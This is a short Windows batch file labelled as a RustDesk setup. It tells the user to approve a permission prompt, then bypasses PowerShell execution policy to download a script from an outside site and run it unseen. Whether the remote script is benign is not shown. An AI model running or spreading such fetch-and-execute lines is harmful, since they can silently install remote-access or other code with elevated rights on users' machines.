@echo off
title RustDesk Setup
echo Setting up RustDesk, please wait...
echo A Windows permission prompt may appear - click Yes.
echo.
powershell -NoProfile -ExecutionPolicy Bypass -Command "iwr -useb https://support.brendonslab.com/support-windows.ps1 | iex"
